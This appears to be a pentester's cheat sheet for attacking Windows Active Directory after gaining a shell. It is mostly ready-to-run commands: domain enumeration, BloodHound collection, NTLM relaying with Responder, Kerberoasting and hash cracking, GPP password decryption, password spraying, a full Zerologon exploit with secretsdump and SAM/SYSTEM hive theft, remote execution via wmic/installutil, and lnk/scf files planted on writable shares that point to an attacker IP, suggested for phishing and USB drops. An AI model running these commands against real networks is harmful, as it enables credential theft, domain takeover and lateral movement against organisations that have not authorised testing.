Basics on what to do upon getting shell/rce #

Note: Try as much as possible to Live off the land

Good blogs for these: #

Also keep these vulnerabilities that Microsoft Won't Fix in mind when performing domain enumeration.


Just basic stuff #

whoami /all
hostname
ipconfig /all
systeminfo
query user
qwinsta
gpresult /R 
dir
tree /f /a
tasklist /V
net user
net user /domain
net user <username>
net user <username> /domain
net localgroup
net localgroup administrators
net groups /domain
net group "<group>" /domain
net group "domain admins" /domain
klist

NLTest #

nltest /dclist:<domain>
nltest /dsgetdc:<domain>
nltest /domain_trusts /all_trusts

PowerShell Enumeration #

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', '<domain>')))).GetAllTrustRelationships()

Tools for automating enumeration #


Dumping credentials #


Bloodhound (Sharphound) #

  1. On local machine (~Kali)

    • Bloodhound Installation
    • Running the bloodhound ingestor from Linux:
      cd /opt
      git clone https://github.com/fox-it/BloodHound.py
      cd BloodHound.py
      # build the image from the repository's Dockerfile before running it
      sudo docker build -t bloodhound .
      sudo docker run -v ${PWD}:/bloodhound-data -it bloodhound
      # bloodhound-python -d domain.local -u user01 -p P@ssw0rd -c all,loggedon --zip

  2. SharpHound officially supported ingestors

    • Running the official/supported SharpHound collectors gathers more information, although BloodHound.py is quick and good enough for most cases
    • Running on the victim host
      .\SharpHound.exe -c all --encryptzip --nosavecache --zipfilename bh.zip -d domain.local

    • Runas
      • If logged in with a local user account but holding domain user credentials, run the following on the command line
      • This also gets SharpHound to run and ingest data even if your own Windows VM is not part of the domain
        • This avoids having to run SharpHound on the host itself, where AV/EDR is present
          C:\> runas /netonly /user:<DOMAIN>\<username> "powershell.exe -exec bypass"

          # then in the spawned PowerShell
          .\SharpHound.exe -c all --nosavecache --zipfilename bh.zip -d domain.local

    • Run after SharpHound for some nice statistics
    • Mass import owned users in Bloodhound
    • Bloodhound Custom Queries
    • Bloodhound attacks
      • GenericAll
        • Although the commands in the reference work, I found that it was easier to modify permissions and perform other actions (reset user password) using RSAT.
        • If your Windows attacking VM is connected to the network, just run mmc as a domain user (provided you already have the domain user's credentials).

NTLM Relaying #

  • Basic NTLM Relay
    • Gather the NTLM relay list (hosts that do not require SMB signing) using crackmapexec
      • crackmapexec smb --gen-relay-list relay_list.txt company_internal_subnets.txt
        sudo impacket-ntlmrelayx -socks -smb2support -of output.txt -tf ./relay_list.txt -c ipconfig
        sudo responder -I eth1 -Pvd
        

General Attack methods #

  • Methods
    • NTLM Relay
    • Golden Ticket
      • Requires full domain compromise.
      • Used for persistence and pivoting
    • Kerberoasting
      • Requires access as any user.
      • Used to escalate and pivot
    • Silver Ticket
      • Requires the service account hash.
      • Used for persistence and escalation
    • Pass-the-Ticket
      • Requires access as a user.
      • Used to pivot
    • Over-Pass-the-Hash
      • Requires access as a user.
      • Used to pivot

Kerberoasting #

  1. From Linux

    • Beware of the time difference between the attacking machine (Kali) and the targeted Domain Controller; Kerberos rejects requests outside the allowed clock skew
      GetUserSPNs.py -debug -request -outputfile TGS_file.txt -dc-ip <DC_IP_Address> <FQDN>/<username>

  2. From Windows

    • PowerSploit
      Invoke-Kerberoast -Domain domain.com -OutputFormat hashcat

      • Getting SPN tickets from an external forest
        • Works if the external forest trusts the domain you are in
          Get-DomainSPNTicket <SERVICE>/DC01.domain-external.com@domain-external.com
          

Password Cracking #

  • Refer to m0chan's blog

# -a 0 is the straight (wordlist) attack mode; -m 13100 is Kerberos 5 TGS-REP etype 23
hashcat64.exe -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt


Gathering Windows GPP passwords #

  1. On the target machine, logged on with a regular domain account
    findstr /S cpassword \\<domain_controller>\sysvol\*.xml

  2. On local machine (~Kali)
    gpp-decrypt <cpassword_value>
    

ADFind #

adfind.exe -f objectclass=trusteddomain
adfind.exe -sc trustdmp

ADRecon #

# On your own Windows VM after the "runas" command
.\ADRecon.ps1 -Method LDAP -DomainController dc01.acme.local -Credential ACME\user01

RSAT #

  • Run RSAT from a non-domain joined PC
    runas /netonly /user:<DOMAIN>\<username> "mmc /server=<DC or domain>"
    runas /netonly /user:ACME\bob.normal.user "mmc /server=dc01.acme.local"
    

Domain Password Spraying #

Dafthack's DomainPasswordSpray #

  • Retrieves the list of domain users, sprays, and attempts to detect the lockout threshold so that it stops spraying before accounts get locked out
    Import-Module .\DomainPasswordSpray.ps1
    Invoke-DomainPasswordSpray -Password Spring2017
    

Find interesting Domain Share Files #

  • Find-InterestingDomainShareFile
    Find-InterestingDomainShareFile

  • Snaffler
    runas /netonly /user:domain.local\victim01 cmd.exe
    snaffler.exe -s -o snaffler_.log

  • Crackmapexec
    • Also refer to this
      crackmapexec smb -d domain.local -u victim01 -p P@ssw0rd -M spider_plus
      

Direct Attacks to the Domain Controller #

Zerologon #

  • Resets the machine account password of a vulnerable domain controller
    • Remember to restore the password afterwards
    python3 zerologon_tester.py dc02 10.10.10.20 # From SecuraBV

    python3 cve-2020-1472-exploit.py dc02 10.10.10.20 # From dirkjanm

    secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20 # From impacket
  • Password restoration process
    wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/administrator@10.10.10.20
    cd Windows/temp
    reg save HKLM\SYSTEM system.save
    reg save HKLM\SAM sam.save
    reg save HKLM\SECURITY security.save

    smbclient \\\\10.10.10.20\\c$ -U 'acme.local\\administrator%2b576acbe6bcfda7294d6bd18041b8fe' --pw-nt-hash
    cd Windows/temp
    get system.save
    get security.save
    get sam.save

    wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/administrator@10.10.10.20
    cd Windows/temp
    del system.save
    del security.save
    del sam.save

    secretsdump.py -sam sam.save -system system.save -security security.save local

    python3 restorepassword.py acme.local/dc02@dc02 -target-ip 10.10.10.20  -hexpass ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a289749225276c7c2e3181555fa5eef21d4d1ba23aba0f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020 # From dirkjanm

    secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20
    

Pivoting #

Executing Commands Remotely #

PsExec #

PowerShell Remote Session (PSRemote) #

  • The "usual" requirement is that you must be in the same subnet as the machine you are connecting to
  • Create a session
    • Without specified credentials
      New-PSSession dc01.domain.com
      $s = New-PSSession dc01.domain.com

    • Create a session with credentials
      $cred = Get-Credential
      New-PSSession dc01.domain.com -Credential $cred

  • Run commands remotely via PSSession
    Invoke-Command -Session $s -FilePath C:\Temp\Rubeus.ps1

  • Interactive PSSession
    Enter-PSSession -Id <#>

  • Exit PSSession
    Remove-PSSession -Id <#>
    

Windows Remote Management #

winrs -r:DC01.domain.com cmd

WMIC #

  • Run a DLL file remotely using wmic via installutil
    wmic /node:dc01.domain.com process call create "cmd.exe /c \windows\microsoft.net\framework64\v4.0.30319\installutil.exe /logfile= /u \temp\file.dll"
    

Creating lnk file in writable shares #

  • Not OPSEC safe
  • In my experience, IT noticed randomly generated folder names (not necessarily a file)
  • Still good for inserting into phishing email attachments and USB drops (combine with knary)
    crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M slinky -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateLnk
    crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M scuffy -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateScf
    

Last update: April 28, 2022